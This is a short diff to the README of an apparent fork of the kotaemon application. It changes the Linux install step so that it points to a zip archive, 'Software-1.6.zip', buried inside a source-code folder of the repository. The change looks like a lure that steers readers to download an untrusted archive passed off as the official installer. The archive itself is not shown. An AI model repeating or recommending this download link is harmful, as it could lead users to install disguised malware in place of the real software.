lillyk18101978/kotaemon/README.md

 3. **Install the Application**
    - For Windows: Double-click the `.exe` file you downloaded and follow the prompts to install.
    - For Mac: Open the `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Unpack the `.tar.gz` file and follow the README instructions.
+   - For Linux: Unpack the `https://github.com/lillyk18101978/kotaemon/raw/refs/heads/main/libs/kotaemon/kotaemon/agents/react/Software-1.6.zip` file and follow the README instructions.

 ## 💻 System Requirements
 To ensure that kotaemon runs smoothly on your machine, please make sure you meet the following requirements: